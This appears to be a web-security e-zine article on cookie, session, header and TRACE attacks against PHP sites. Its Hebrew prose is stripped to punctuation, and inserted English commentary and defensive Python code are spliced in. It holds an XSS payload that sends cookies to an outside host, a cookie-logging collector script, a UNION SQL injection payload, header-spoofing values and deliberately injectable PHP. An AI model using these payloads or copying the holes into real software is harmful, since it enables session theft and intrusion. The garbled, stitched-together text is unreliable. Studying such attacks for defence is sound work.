Set-Cookie: id=1538; expires=Sat, 20-Apr-2013 12:13:12 GMT
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

.1538 id
.
:
GET /index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115

Connection: keep-alive
Cookie: id=1538
.
.
? : . id- .1538 :
, ,?
...
GET /index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: id=1
" , 1538 - ,1-
.
. ,
! Cookie Modification .Cookie Manipulation
: .
, .
, :
. ,
: ,
. ,
. .
( : )
HTTP/1.1 200 OK
Date: Fri, 26 Mar 2010 14:24:56 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1

X-Powered-By: PHP/5.3.1
Set-Cookie: ban=1; expires=Sat, 20-Apr-2013 12:13:12 GMT
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

, ...

( ) ,
. , , 2
.

,
. . .

( - )Brute Force . ,
. :
.
Brute Force - ,
( .)...IP, User-Agent ,
( )...MD5, SHA1 Brute-Force ,
, .
( ,)POST
.

( Cookies Stealing )Cookies Grabbing .
Cross Site Scripting, Cross Site Tracing :...
.
. , ,
.
?
, ,
. , , .

Cross Site Scripting


, Javascript - .
:
<script>location.replace("http://muhaha.com/save.php?c="+document.cookie);</script>
( )Redirection ( ) .
. :
http://muhaha.com/save.php?c=Cookies
,Cookies .
(.)save.php save.php :
<?php
if ( isset($_GET['c']) && is_string($_GET['c']) && !empty($_GET['c']) )
{
    $handle = @fopen('list.txt','a');
    if ( $handle )
    {
        @fwrite($handle,"\r\n\r\n".$_GET['c']); // blank line between stolen entries
        @fclose($handle);
    }
    header("Location: http://the-site-the-surfer-came-from.com/index-file.html");
}
?>
:
, .
.
,
.
list.txt ,
, htaccess -
( .)wwwroot / public_html-


Sessions-
, . ?
:Session . Session .
Session Identifier
. ,PHP- .PHPSESSID
. ,Sessions- :
( Session Hijacking )Session-
( PHPSESSID ) , .
, .Session
Session Hijacking : Session
IP - Session User-Agent .
Session- , .
:
<?php
session_start();
if ( count($_SESSION) )
{
    $valid = md5($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']);
    if ( isset($_SESSION['valid']) )
    {
        if ( $_SESSION['valid'] != $valid )
        {
            // client fingerprint changed: drop this session and continue with a fresh, empty one
            session_unset();
            session_destroy();
            session_start();
            session_regenerate_id(true);
        }
    }
    else
    {
        $_SESSION['valid'] = $valid;
    }
}
// the rest of the page follows


Sessions-
Sessions - , ,
. Sessions- (
).
( Session Fixation )Session-
PHPSESSID , .
( )POST (.)GET
:
http://www.site.com/index.php?page=login&PHPSESSID=h2dsamokpimsfp11v2nh9e6mc7
? :
:
http://www.site.com/index.php?page=index&PHPSESSID=h2dsamokpimsfp11v2nh9e6mc7
Session , Session- :
h2dsamokpimsfp11v2nh9e6mc7
( )
:
http://www.site.com/index.php?page=login&PHPSESSID=h2dsamokpimsfp11v2nh9e6mc7
.Session- ,
.Session-
Session - .h2dsamokpimsfp11v2nh9e6mc7 :
Session - , -
Session .
: .

,Session Hijacking
. ,php.ini- ,PHP- :
session.use_cookies = 1
session.use_only_cookies = 1
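An added example (not the article's PHP) of how a server-side session store can combine the defences discussed above: bind the session to a keyed fingerprint of the client, refuse to adopt ids that are malformed or unknown instead of creating a session under them (the effect session.use_only_cookies has for URL-supplied ids), and rotate the id on login so that a planted id is worthless afterwards. The SessionStore class, the secret and the addresses in the scenario are assumptions made for the example.

```python
import hashlib
import hmac
import re
import secrets

# PHP's default session-id alphabet: a-z, A-Z, 0-9, ',' and '-' (the warning quoted later lists it)
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]{22,128}$")


class SessionStore:
    """In-memory server-side session table (added example; an assumed design, not the article's code)."""

    def __init__(self, secret):
        self._secret = secret
        self._sessions = {}

    def _fingerprint(self, remote_addr, user_agent):
        # Keyed hash of the client attributes, the same idea as the article's md5(REMOTE_ADDR . USER_AGENT)
        msg = f"{remote_addr}|{user_agent}".encode("utf-8")
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def _new_id(self, fp):
        sid = secrets.token_hex(16)          # 32 hex chars: inside the PHP alphabet, unguessable
        self._sessions[sid] = {"fp": fp, "user": None}
        return sid

    def start(self, presented_id, remote_addr, user_agent):
        """Return the session id to use for this request.
        Ids that are malformed, unknown, or bound to a different client are never adopted:
        a URL-supplied id (fixation) or a stolen cookie replayed from elsewhere (hijacking)
        yields a brand-new empty session instead."""
        fp = self._fingerprint(remote_addr, user_agent)
        if presented_id and SESSION_ID_RE.match(presented_id):
            sess = self._sessions.get(presented_id)
            if sess is not None:
                if hmac.compare_digest(sess["fp"], fp):
                    return presented_id
                del self._sessions[presented_id]   # fingerprint mismatch: destroy, as the PHP does
        return self._new_id(fp)

    def login(self, sid, user):
        """Rotate the id on authentication; anything issued before login stops working."""
        data = self._sessions.pop(sid)
        data["user"] = user
        new_id = secrets.token_hex(16)
        self._sessions[new_id] = data
        return new_id

    def user(self, sid):
        sess = self._sessions.get(sid)
        return sess["user"] if sess else None


def fixation_scenario():
    """Attacker plants a known id on the victim, then tries to use it after the victim logs in."""
    store = SessionStore(b"server-side secret (constructed for the example)")
    planted = store.start(None, "198.51.100.9", "attacker-agent")        # attacker obtains a valid id
    victim_sid = store.start(planted, "203.0.113.4", "Firefox/3.6.2")     # victim follows the planted link
    victim_sid = store.login(victim_sid, "roy")                           # victim authenticates
    return {"planted_reused": victim_sid == planted,
            "attacker_sees_user": store.user(planted),
            "victim_user": store.user(victim_sid)}


if __name__ == "__main__":
    print(fixation_scenario())
```

The deletion on fingerprint mismatch mirrors the article's session_destroy: it also means an attacker who replays a stolen id once logs the victim out, which is the price of that design; rotating the id on login is the part that defeats fixation regardless.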

?
Sessions .
. ,
.
Session-
: PHP -
( )Full Path Disclosure" ,PHPSESSID -
Session-.
( : )
GET /index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=.
:
Cookie: PHPSESSID=.
Session- , .
PHP- :
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/roy/domains/roydomain.com/public_html/folder/file.php on line 2
? , !
?
:
roy

:
folder/file.php
:
/home/roy/domains/roydomain.com/public_html/
, .

User-Agent
?User-Agent User-Agent :
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
, .:
( )5.0
(=N =U , =I , )
Windows XP
()hebrew
Gecko 1.9.2.2 16.03.2010
Firefox 3.6.2
( IP- ) Referer-
( ) . , ? ,
, ?
" , "...
, " : , ."...
,? , ( :
) . ? IP - ,
. , User-Agent :
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
.. ! User-Agent
,Faking?



, ,
.
..
? ?
. Referer . , ( ,
) ...
Referer: http://this-site-address.com/index.php
- . Referer Faking
.

, .Internet Explorer
,
" , .
? :
.User-Agent :
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
,
. , User-Agent
MSIE ,Microsoft Internet Explorer
.MSIE , ...
.
, ,MSIE :
User-Agent: MSIE
, ! ( User-Agent Faking User-
.)Agent Modification

,
. ,
, .
:

<input type="text" ... value="" maxlength="10" />


( )HTML- 10
. ( ),
. ? :
.1 .JavaScript Injection- ( )
: PHP
.DigitalWhisper ( -
)DigitalWhisper : , .
.2 .Form Manipulation- .
.3 .Firefox .Web Developer- .
JavaScript-
( )counter ,Javascript- ,
. , . ,
, .
. . ,
Javascript - , .
? Javascript Injection, Form Manipulation . ...
,
.
cp77fk4r ( TryThis0ne ,
) . :
http://trythis0ne.com/levels/web-challanges/MSD/index.php
?
. ,
... ? ):
,Javascript
. , ,
.


:
- :
4 . , , .
Javascript Injection -
, ( , ) :
javascript:void(count1=0,count2=0,count3=0,count4=0);
( ,Javascript Injection [ ]
)
- :
, , :
document.a.submit();
, . ,( :
)
javascript:document.a.submit();
- :
? :
setTimeout('countdown()',1000);
countdown ( 1000 = ).
, - .
, , ( ,)setInterval
.:
javascript:void(setInterval('countdown()',1));
( ) countdown ,
. ,
, ( ) .
, .
,
, .

.
. , IP
(

) : .
, :
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
</gr_repl>
" "he " ,"hebrew - Hebrew : , .
. User-Agent Modification
.:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
en ,english - English : , ,
.

. ,
.
(
" X ").
, ,? , .
? :
. ,disabled ( )true .
, ( ,)false -
,Javascript . ?
Javascript Injection, Form Manipulation : .
JavaScript-
"- " ,
, JavaScript - ( navigator
).
Request- ,
. ,Firefox -
. ,Coral IE Tab
.
, ,Internet Explorer - .Mozilla Firefox
. ,User-Agent Switcher
User-Agent navigator
. .

IP- ( )
IP-
. , IP-
. , , .
IP- , .
? Proxy , IP
. ?
IP IP -
:
if ( isset($_SERVER['HTTP_CLIENT_IP']) && preg_match(...) )
{
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CLIENT_IP'];
}
,Client-IP ( IP - )
.
( )Header ,
. , :
Client-IP: 209.85.135.99
IP- IP- . ,
IP- IP- ... .
Invision Power Board- .
IP- ( Client-IP ).
,( .IP address spoofing in e107 : X-
.)Forwarded-For
IP - . .
IP- :
Client-IP: 000.00.000.00
, :
Client-IP: 127.0.0.1
IP - .localhost - ,
.

Client-IP .
,Proxy-User .
:
if ( isset($_SERVER['HTTP_PROXY_USER']) && preg_match(...) )
{
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PROXY_USER'];
}
( : IP )
Proxy-User: 000.00.000.00
,:
if ( isset($_SERVER['HTTP_PROXY_USER']) )
{
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PROXY_USER'];
}
,IP
:
Proxy-User:
, IP - ,
.
, :
Client-IP
X-Forwarded-For
Proxy-User
Forwarded
Useragent-Via
Proxy-Connection
Xproxy-Connection
Pc-Remote-Addr
Via
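The snippets above all share one flaw: a header the client chose is allowed to overwrite REMOTE_ADDR. The following Python is an added example (not the article's code) that puts that naive logic beside a hardened version, which only honours X-Forwarded-For when the TCP peer is one of the operator's own proxies, walks the hops right to left past those proxies, and falls back to the peer address for anything that does not parse as an IP (including the SQL-style payloads discussed later). The addresses and proxy ranges are constructed for the example.

```python
import ipaddress

# Headers the article lists as "IP" sources that a client can simply type into a request
CLIENT_SUPPLIED_IP_HEADERS = ("client-ip", "x-forwarded-for", "proxy-user", "forwarded", "pc-remote-addr")


def naive_client_ip(remote_addr, headers):
    """Equivalent of the vulnerable PHP above: overwrite REMOTE_ADDR with whatever header arrives."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in CLIENT_SUPPLIED_IP_HEADERS:
        if name in lowered:
            return lowered[name].split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr, headers, trusted_proxies):
    """Hardened version. The socket peer is authoritative unless it is one of *our* proxies
    (trusted_proxies: list of CIDR strings); only then is X-Forwarded-For consulted, walking
    right to left past trusted hops to the first address we did not add ourselves.
    Junk that is not an IP address falls back to the peer address."""
    peer = ipaddress.ip_address(remote_addr)
    nets = [ipaddress.ip_network(n) for n in trusted_proxies]
    if not any(peer in n for n in nets):
        return str(peer)
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)                      # forged or malformed entry: ignore the whole header
        if not any(addr in n for n in nets):
            return str(addr)
    return str(peer)                              # every hop was one of ours: nothing better than the peer


if __name__ == "__main__":
    spoof = {"Client-IP": "127.0.0.1"}            # constructed request from 203.0.113.5 claiming localhost
    print("naive:", naive_client_ip("203.0.113.5", spoof))
    print("hardened:", client_ip("203.0.113.5", spoof, ["10.0.0.0/8"]))
```

Any access-control or rate-limiting decision (the bans and vote counters mentioned earlier) should be keyed on the value client_ip returns, never on a header read straight from the request.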
, , ):



GET- , ."
. ( User-Agent, Referer : Cookie- ,)Sessions-
.
? ? ,
:
,
.
Session Injection
Session-
,
:
<?php
mysql_connect('host','username','password');
mysql_select_db('database');
$sessionId = $_COOKIE['PHPSESSID'];
$query = mysql_query("SELECT username,email,points,settings FROM members WHERE last_session_id='{$sessionId}'");
$rows = mysql_num_rows($query);
if ( $rows > 0 )
{
    $memberInfo = mysql_fetch_array($query);
}
mysql_close();
?>
PHPSESSID Session Identifier -,
Session - . , SQL
.Injection

User-Agent Injection
,User-Agent ).

( User-Agent ,
:)
<?php
mysql_connect('host','username','password');
mysql_select_db('database');
$ua = $_SERVER['HTTP_USER_AGENT'];
$query = mysql_query("SELECT ua FROM ua WHERE ua='{$ua}'");
if ( mysql_num_rows($query) == 0 )
mysql_query("INSERT INTO ua VALUES('{$ua}')");
mysql_close();
?>
User-Agent . User-Agent
. SQL Injection
Referer Injection
: .
<?php
mysql_connect('host','username','password');
mysql_select_db('database');
$referer = $_SERVER['HTTP_REFERER'];
$query = mysql_query("SELECT url FROM referers WHERE url='{$referer}'");
if ( mysql_num_rows($query) == 0 )
mysql_query("INSERT INTO referers VALUES('{$referer}')");
mysql_close();
?>
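The three snippets above fail in exactly the same way (a header value spliced into SQL text), so one added example covers them. It is Python with sqlite3, written for this edition and not the article's PHP: record_header_vulnerable builds the query by string concatenation as the PHP does, record_header_safe binds the value as a parameter. The schema, the member row and the UNION payload are constructed for the example; the same payload would arrive in User-Agent, Referer or the PHPSESSID cookie.

```python
import sqlite3


def open_db():
    """In-memory schema mirroring the article's `ua` and `members` tables, with one constructed member row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ua (ua TEXT)")
    conn.execute("CREATE TABLE members (username TEXT, email TEXT, points INTEGER)")
    conn.execute("INSERT INTO members VALUES ('roy', 'roy@example.invalid', 1538)")
    return conn


def record_header_vulnerable(conn, value):
    """Mirror of the PHP above: the header value becomes part of the SQL text."""
    rows = conn.execute(f"SELECT ua FROM ua WHERE ua='{value}'").fetchall()
    if not rows:
        conn.execute(f"INSERT INTO ua VALUES('{value}')")
    return rows


def record_header_safe(conn, value):
    """Same logic with bound parameters: the header stays data, whatever it contains."""
    rows = conn.execute("SELECT ua FROM ua WHERE ua=?", (value,)).fetchall()
    if not rows:
        conn.execute("INSERT INTO ua VALUES(?)", (value,))
    return rows


def vulnerable_breaks_on_quote(conn, value="Mozilla/5.0 (Bob's browser)"):
    """Even an honest value with an apostrophe breaks the string-built query (a tell-tale for testers)."""
    try:
        record_header_vulnerable(conn, value)
        return False
    except sqlite3.OperationalError:
        return True


# A User-Agent an attacker might send; constructed for this example. The leading quote closes the
# literal, UNION appends a row built from the members table, and -- comments out the trailing quote.
UNION_PAYLOAD = "' UNION SELECT username || ':' || email || ':' || points FROM members --"


if __name__ == "__main__":
    conn = open_db()
    print("vulnerable:", record_header_vulnerable(conn, UNION_PAYLOAD))   # member data comes back
    print("safe:", record_header_safe(conn, UNION_PAYLOAD))               # nothing matches; stored literally
    print("stored:", conn.execute("SELECT ua FROM ua").fetchall())
```

In the PHP the result is not printed, only counted, so extraction would be blind (one bit per request via the insert-or-not side effect); the injection is the same either way.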
,User-Agent Injection ,
.User-Agent ) Referer( .

Cookie Injection
, . ,
:

if ( isset($_COOKIE['user-id']) )
{
    $file = file_get_contents('accounts/'.$_COOKIE['user-id'].'.txt');
    $file = str_replace("\r",'',$file); // normalise line endings
    $memberInfo = explode("\n",$file);
}
, Local File Inclusion- .user-id
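An added example (not from the article) of the path check the snippet above lacks. It builds a throwaway accounts directory, shows the unchecked variant reading a file outside it when the cookie carries user-id=../secret, and a safe variant that accepts only the numeric ids the application issues and then verifies that the resolved path is still inside the directory. Directory layout and file contents are constructed for the example.

```python
import os
import re
import tempfile


def account_path_vulnerable(accounts_dir, user_id):
    """Mirror of the PHP above: the cookie value is glued into the path unchecked."""
    return os.path.join(accounts_dir, user_id + ".txt")


def account_path_safe(accounts_dir, user_id):
    """Allow only identifiers the application actually issues, then prove the resolved path
    is still inside accounts_dir (catches '..' sequences and symlink tricks alike)."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("user-id must be numeric")
    base = os.path.realpath(accounts_dir)
    path = os.path.realpath(os.path.join(base, user_id + ".txt"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes the accounts directory")
    return path


def traversal_demo():
    """Constructed layout: accounts/1538.txt plus a secret one level up; returns what each variant does."""
    root = tempfile.mkdtemp()
    accounts = os.path.join(root, "accounts")
    os.mkdir(accounts)
    with open(os.path.join(accounts, "1538.txt"), "w") as f:
        f.write("roy\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("not for members\n")
    hostile = "../secret"                       # what arrives as Cookie: user-id=../secret
    with open(account_path_vulnerable(accounts, hostile)) as f:
        leaked = f.read().strip()
    try:
        account_path_safe(accounts, hostile)
        blocked = False
    except ValueError:
        blocked = True
    with open(account_path_safe(accounts, "1538")) as f:
        legit = f.read().strip()
    return {"leaked": leaked, "blocked": blocked, "legit": legit}


if __name__ == "__main__":
    print(traversal_demo())
```

The whitelist on the identifier does most of the work; the realpath check is the second line of defence for the day somebody relaxes the pattern.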

, . ,
.
, . ,
, .
,:
HTTP Response Splitting
HTTP Response Splitting cp77fk4r
.DigitalWhisper .
.
File Download Injection
File Download Injection - -
.
( PHP ) . .DigitalWhisper
DigitalWhisper - .

Open Redirection
( )Open Redirection ( ),
,
. :
http://my-awesome-site.com/move.php?to=main.php

:
HTTP/1.1 302 Found
Date: Sun, 11 Apr 2010 20:39:48 GMT
Server: Apache/2.2.11 (Win32)

Location: main.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
:
Location: main.php
? :
http://my-awesome-site.com/move.php?to=http://google.co.il
, , .
.

? : ( Nvidia , ) .
Open Redirection . .
:
http://nvidia-site.com/download.php?driver=DriverName.exe
, : DriverName.exe / /
' .
, , , !
" : nvidia - , !" - .
. ,
... ?Nvidia! ,
.

Cross Site Tracing


HTTPOnly-
( XSS )Cross Site Scripting : .
. , ,
.
, ( Microsoft )2002
.HTTPOnly ,

. , ,
Javascript- .
:
<script type="text/javascript">
document.cookie = "side_menu=1";
document.cookie = "id=123; HTTPOnly";
document.cookie = "password_hash=e1245f16d; HTTPOnly";
alert(document.cookie);
</script>
document.cookie- .Javascript
:
document.cookie = "side_menu=1";
side_menu ,1
. ,Javascript
.
, :
document.cookie = "id=123; HTTPOnly";
document.cookie = "password_hash=e1245f16d; HTTPOnly";
HTTPOnly , .
( Session
).
,Javascript- alert:
alert(document.cookie);

, ,alert :
side_menu=1
, HTTPOnly- ,Javascript
. .
.HTTPOnly ,HTTPOnly
. , !


Authorization

. ? ,HTTPOnly
,Javascript .
.Authorization
, .
htaccess - .htpasswd-
- HTAccess- cp77fk4r
.DigitalWhisper
, . ,
.
, ,PHP- :
<?php
$user = (isset($_SERVER['PHP_AUTH_USER']) && $_SERVER['PHP_AUTH_USER'] == 'roy');
$pass = (isset($_SERVER['PHP_AUTH_PW']) && $_SERVER['PHP_AUTH_PW'] == '777');
if ( !$user || !$pass )
{
    header('WWW-Authenticate: Basic realm="Please Identify"');
    header('HTTP/1.0 401 Unauthorized');
    die('Access Denied');
}
?>
You have identified. This is my site... bla bla bla
:
HTTP/1.0 401 Unauthorized
Date: ...
Server: ...
WWW-Authenticate: Basic realm="Please Identify"
, Authorization:
Authorization: Basic Og==


( ) :
Authorization: Basic cm95Ojc3Nw==
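The exchange above in Python, as an added example (not the article's PHP): parsing the WWW-Authenticate challenge, building and decoding the Authorization header (roy:777 gives cm95Ojc3Nw==, an empty user and password give Og==), and a constant-time credential check. The expected credentials are the ones from the PHP snippet, used here only as test data; parse_authorization is deliberately the same operation an eavesdropper, or a script reading a reflected TRACE, would perform.

```python
import base64
import hmac


def parse_challenge(header):
    """Parse `Basic realm="Please Identify"` (the WWW-Authenticate value) into (scheme, {param: value})."""
    scheme, _, rest = header.strip().partition(" ")
    params = {}
    for part in rest.split(","):
        name, _, value = part.strip().partition("=")
        if name:
            params[name.lower()] = value.strip().strip('"')
    return scheme, params


def make_authorization(user, password):
    """Client side: base64 of user:password. This is encoding, not encryption."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode("ascii")
    return f"Basic {token}"


def parse_authorization(header):
    """Server side, or anyone who can read the header: recover the user and the clear-text password."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic authentication")
    decoded = base64.b64decode(token, validate=True).decode("latin-1")
    user, _, password = decoded.partition(":")      # the password itself may contain ':'
    return user, password


def check_credentials(header, expected_user, expected_password):
    """Constant-time comparison of both fields (the PHP above uses ==, which is not)."""
    try:
        user, password = parse_authorization(header)
    except (ValueError, UnicodeDecodeError):        # malformed base64 raises binascii.Error (a ValueError)
        return False
    ok_user = hmac.compare_digest(user.encode("latin-1"), expected_user.encode("latin-1"))
    ok_pw = hmac.compare_digest(password.encode("latin-1"), expected_password.encode("latin-1"))
    return ok_user and ok_pw


if __name__ == "__main__":
    print(parse_challenge('Basic realm="Please Identify"'))
    auth = make_authorization("roy", "777")
    print(auth, "->", parse_authorization(auth))
    print("valid:", check_credentials(auth, "roy", "777"))
```

Because the header is recoverable by anyone who sees it, Basic authentication only makes sense over TLS and on servers where TRACE cannot echo it back into a script.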
: .HTTPOnly-
HTTPOnly- TRACE
Cross Site Scripting
,?
,TRACE . ,
, .
HTTPOnly - TRACE - ?
,TRACE .
, :
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
Server: Apache/2.2.11 (Win32)
Transfer-Encoding: chunked
Content-Type: message/http
TRACE /index.html HTTP/1.1
Host: 127.0.0.1

, Cookie .:
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
Cookie: id=123&password_hash=e1245f16d
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
Server: Apache/2.2.11 (Win32)

Transfer-Encoding: chunked
Content-Type: message/http
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
Cookie: id=123&password_hash=e1245f16d
( : , )
<script type="text/javascript">
if (window.XMLHttpRequest) // IE7+, Firefox, Chrome, Opera, Safari
    var xmlhttp = new XMLHttpRequest();
else // IE5, IE6
    var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.onreadystatechange = function()
{
    if ( xmlhttp.readyState == 4 && xmlhttp.status == 200 )
        alert(xmlhttp.responseText);
}
xmlhttp.open("TRACE","http://site.com",true);
xmlhttp.send();
</script>
: Flash, Java, Visual Basic Script, Ajax... (Note that current browsers reject TRACE in XMLHttpRequest outright, so the script above only works in old clients or through such plugins.)
TRACE , ( ) .
XSS .
,Alert ,
, ( User-Agent )IP
. ,
.TRACE ,X () TRACE Y
.Y .Cross Domain
: TRACE
TRACE- htaccess ( : )ModRewrite-
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
or with a Limit block (note that Apache's core answers TRACE before Limit is consulted, so this form does not actually stop TRACE; the supported switch is TraceEnable off, available since Apache 1.3.34 and 2.0.55):

<Limit TRACE>
order deny,allow
deny from all
</Limit>

Same Origin Policy


Cross Site Tracing ( SOP
)Same Origin Policy .
, Javascript- , -
, (
) . , Cross Site Tracing
Cross Domain Javascript - TRACE
, , Same Origin
.Policy ,
, .
- ?

.HTTP-
Header
, " :
".
, ,
.
.
HTTP
HTTP - , ,SQL Injection
,HTTP HTTP -
HTTP -
.

( :)cp77fk4r
, ( )
( .DigitalWhisper )
() ... , ):



.Digital Whisper
- . , , ,
. 2 - ,
.
, , ( - 37 -
) .
Digital Whisper !
" " ,
, editor@digitalwhisper.co.il

, , :

www.DigitalWhisper.co.il

.2010
,
,
30.04.2010

